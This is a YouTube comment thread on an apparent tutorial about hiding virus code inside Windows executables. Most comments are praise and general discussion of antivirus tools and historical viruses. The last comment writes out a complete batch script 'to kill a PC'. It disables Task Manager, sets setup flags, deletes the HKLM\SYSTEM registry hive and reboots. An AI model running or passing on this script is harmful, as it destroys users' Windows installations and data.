Want early access to new videos and some behind the scenes content? Consider becoming a channel member kzbin.info/door/QvW_89l7f-hCMP1pzGm4xwjoin
@extrasolar99768 ай бұрын
New challange: infect the Antimalware service executable
@AllenKll8 ай бұрын
Fun tip about Mcaffee... it doesn't actually check the files. All it does is notice it is new, gets a hash of it, and send it back to McAffe's servers for a determination there. this could take days.
@eadweard.8 ай бұрын
Why would it take days?
@AllenKll8 ай бұрын
@@eadweard. After some initial automated checks, the file can be reviewed by a real person and determined if it is a virus or not.
@eadweard.8 ай бұрын
@@AllenKll Difficult to know quite what you're saying. If you click "Scan" on an previously-unseen file, it's obviously not going to sit on "Scanning" for days while a human looks at it.
@AllenKll8 ай бұрын
@@eadweard. No, it doesn't find it's hash in the file DB, so it gathers information, sends it off to the mcaffee servers, and tells you it's fine.
@Free2PlayLessPays8 ай бұрын
>lemme mail this infected file to the boss, so he can check if its alright
@nonessentialfungus4 ай бұрын
Fun fact: the notorious Chernobyl/CIH virus worked much in the way you describe: it would look for empty spaces between the executable sections and then write sections of its code into those empty spaces. Then, when an infected file was run, the virus code would reassemble those sections with some code stored between the PE header and the rest of the data. The reason the virus was so notorious was that its payload would DELETE YOUR BIOS, potentially rendering your machine unusable.
@JohnAlanWoods8 ай бұрын
Your content is the best. I love your vids. They are so accessible and interesting yet just detailed enough to learn something new.
@nathanbaggs8 ай бұрын
Thanks!
@Voxelstice8 ай бұрын
i never knew you COULD hide code in the executable without directly injecting onto the actual code well i guess im going to look into the portable executable format, seems interesting
@Novacification8 ай бұрын
Really interesting and informative video! Always wondered how viruses are made. It's pretty fascinating what is possible when you look below the tidy surface and overcome your default mindset of wanting things to work as expected.
@Urpuss8 ай бұрын
Would be neat for a follow up video to see how you would code an antivirus for this virus
@Nunya582948 ай бұрын
I remember learning about the Portable Executable (PE) file format writing an ELF loader for my UEFI bootloader. This is a great refresher!
@felipecaetano158 ай бұрын
Wait, what about the code digital signature? I thought it was supposed to detect modifications.
@etusax8 ай бұрын
Great video, very interesting! Also it’s been nice to see you grow as a content creator - the videos keep getting better and better produced.
@nathanbaggs8 ай бұрын
Thanks! It's been a lot to learn but I just try to make each video better than the last
@fromthegamethrone8 ай бұрын
Me watching and nodding along. Mhm mhm I understood nothing but loved it.
@AROAH7 ай бұрын
This is actually how a lot of DOS viruses worked. One of the first ways to know a system file was infected was to verify the size, so if you can obfuscate your changes by injecting code into dummy data, you could hide in plain sight. And thus the cat and mouse game that is cybersecurity.
@haxguy08 ай бұрын
Love your content. Really enjoy the flow of your videos and how you walk the viewer through complex concepts.
@b4ux1t3-tech7 ай бұрын
This is such a great video. A lot of folks like to play it safe and not share the "secrets" of malware development. The thing is, the information is all out there. There's nothing gained from hiding anything. The "bad guys" can find this information all over the place. More people knowing about it means more bad people can use it. . .but it also means more good people know how it works so that they can work to defend against it. As we all know, security by obscurity doesn't work.
@nathanbaggs7 ай бұрын
Thanks! Yeah there’s nothing secret here, but I’m hoping it might be new and interesting to a lot of people
@ILightWas8 ай бұрын
ohh so good, this video was delightful. It enlightens clearly so many concepts, like a structured list to later later study more deeply knowing how they relate, THIS was what I most liked.
@istvan_m8 ай бұрын
This was very good. I read some books on Windows Internals a few years ago but never did anything as practical with the knowledge beyond normal development. Thanks for sharing!
@vakqdev8 ай бұрын
plot twist: this video is a virus
@pleasedontwatchthese95938 ай бұрын
Man I got got😊
@ac15cr8 ай бұрын
This was quite an interesting and different video from your previous work. I'd love to see more of it!
@AlexKiraly8 ай бұрын
What an underrated channel, damn!
@m_isho8 ай бұрын
In Windows Defender you can chose to ignore a threat if you think it's a false positive. What this video really shows is that making a zero day exploit is very doable, that antivirus programs may only see certain injections in certain code-caves that it is actively looking for. From a personal point of view as a user and not a developer, I would like it if every system call was prompted on screen much like the "would you like to run this program, yes or no?", but it would show a window with what folder the program wants to change and what files it wants to affect, much like when you copy files and replace them in a folder. The same way Android apps asks for permissions to use location, microphone or access folders, I would like executable files to ask me for permission, and that all these syscalls and permissions would have to be reviewed before granting a program permissions to change certain folders. One of the most annoying things with any executable program, is when it changes a file, folder or registry index without telling you what it's changing. Most installers shows a list of things it wants to install and a user can opt out of optional packages by clicking a checklist. A program or game should say promptly: "We wish to add this to your %appdata% folder" or "Install additional libraries in this location". Since switching to SSDs, a lot of apps chose to install ludicrous big files in the %appdata% folder, which is stored on the OS drive, and it takes up a lot of space for no reason, (looking at you Spotify). There is literally no speed benefit of putting cache in %appdata% compared to putting it in the installation folder on a normal HDD, unless the program or game specifically benefit from loading certain files from an SSD. I find myself creating symlinks from a HDD and putting it into %appdata% folders very often, just to save on space. Until I get a 1TB SSD, I won't be allowing 20GB of cache files to just collect dust on the SSD for a program I run once in a blue moon. Thank you for a very educational video.
@koosa62895 ай бұрын
This is fasctinating and insane to me at the same time, how do people get hang of this low level stuff, seems beyond my comprehension.
@mattmurphy70304 ай бұрын
It’s all written down, just learn to read documentation
@edwardmacnab354Ай бұрын
yeah , it seems like a ton of complex info . There's no way I'm going to be able to incorporate it all . Some people must just have a gift for this .
@clashblaster8 ай бұрын
It's important to note that all the worry about ensuring the program can still execute its own code is only a concern if you're trying to create a stealthy virus that can act without alerting the user to its presence. Plenty of viruses throughout history have foregone the stealthy approach and made it obvious when the user has run an infected program.
@DanelonNicolas8 ай бұрын
I love it 😮 really really nice video 😍 it's awesome how easy it was dude
@cameron13766 ай бұрын
Easy!?
@andersondamasceno8 ай бұрын
I love videos that are for educational purposes only. They are so.... educational. :)
@PoetofHateSpeech9 күн бұрын
The question is, can one do something malicious to ones self?
@Bobbias8 ай бұрын
It would have been nice to see a virustotal result and see how many of its AVs detect you.
@nolram8 ай бұрын
All you need to trip Windows defender is downloading and executing another executable (or sometimes executing another executable at all) - something I have to fight frequently as there are many perfectly reasonable reasons to do this :)
@r4nd0mstuf8 ай бұрын
Love your videos!
@thisiscentralcontrol6 ай бұрын
this channel is so good
@WebCamCartmell8 ай бұрын
Another fantastic video!
@PatrickChilton8 ай бұрын
yer a wizard harry
@nathanbaggs8 ай бұрын
🧙
@wombatpandaa97748 ай бұрын
As usual, McAfee is a total joke
@xanderplayz34467 ай бұрын
And Norton; The pair also run misleading notifications that lead straight to their website; no punycode.
@dtlssm8 ай бұрын
i read somewhere that now you can attack a pc from the bios logo and its nothing you can do about it!crazy
@freedustin8 ай бұрын
you can flash the UEFI and patch it if there is an update available (there is) but tbh, that vuln is not a way in, they have to have a way in first to do that.
@DouglasFish8 ай бұрын
I really love your videos
@HiImKyle8 ай бұрын
I don't think I've ever heard anyone pronounce EXE the way you do. Made me chuckle a lil
@ToniMorton8 ай бұрын
this is a really similar concept to win32 sality it used to bytepatch exes to run itself and was a nasty bit of kit.
@placeholder78527 ай бұрын
9:13 Does that mean that if you were to stick with .text instead of .reloc, windows wouldn't have found any threats?
@nathanbaggs7 ай бұрын
Quite possibly
@daniel_88 ай бұрын
Always excited to watch a new video by you!
@FlamingPhoenix408 ай бұрын
Wait, did you reupload the video with a different thumbnail/title? I'm pretty sure I've seen it on my feed before, but I didn't actually watch it yet
@nathanbaggs8 ай бұрын
You can change title and thumbnail after a video has been uploaded. It’s pretty common practice to tweak a video after upload to try and maximise the number of people who click it (called Click Through Rate or CTR)
@maxmanium20328 ай бұрын
Do you always wear the AVGN fit in videos
@nathanbaggs8 ай бұрын
I just own a lot of white (and pink) shirts
@maxvandenhoven23208 ай бұрын
Nice video! I really like your VSCode theme, would you mind sharing your setup?
@nathanbaggs8 ай бұрын
Sure - I use Dracula theme (and vim plug-in)
@ewookiis8 ай бұрын
Into - if it replicates further, it's a worm :). Or, it's simply ads..
@0LoneTech8 ай бұрын
A worm triggers its own execution on other hosts. A virus relies on something else to execute it.
@nathanbaggs8 ай бұрын
I have a video about worms...
@richbrit1212128 ай бұрын
Fine. I'll put down Fortnight and watch this 😂
@nathanbaggs8 ай бұрын
I make no guarantee this is more interesting than Fortnight (:
@Kolor-kode8 ай бұрын
I made a virus and I went to prison. (oh how I wish I was joking)
@omegaweapon20058 ай бұрын
I want to hear this story!
@apu_apustaja8 ай бұрын
Hello. I like you.
@zgolkar8 ай бұрын
Hehehe, smart. “easIER”, yet not “easY” 😅
@DigitalicaEG8 ай бұрын
Video was paced way too fast for me to keep up with. Would’ve been appreciated if you slowed it down and explained things a bit more.
@x3vr_gtАй бұрын
Ps, if you want to kill a PC, put this in a bat file reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f Taskkill /IM explorer.exe /F reg add HKLM\SYSTEM\Setup /v OOBEInProgress /t REG_DWORD /d 1 /f reg add HKLM\SYSTEM\Setup /v SystemSetupInProgress /t REG_DWORD /d 1 /f reg add HKLM\SYSTEM\Setup /v SetupType /t REG_DWORD /d 1 /f reg add HKLM\SYSTEM\Setup /v SetupPhase /t REG_DWORD /d 1 /f reg delete HKLM\SYSTEM /f shutdown /r /t 0 and run as admin !I AM NOT RESPONSIBLE FOR DESTORYED PCS! !USE AT YOUR OWN RISK!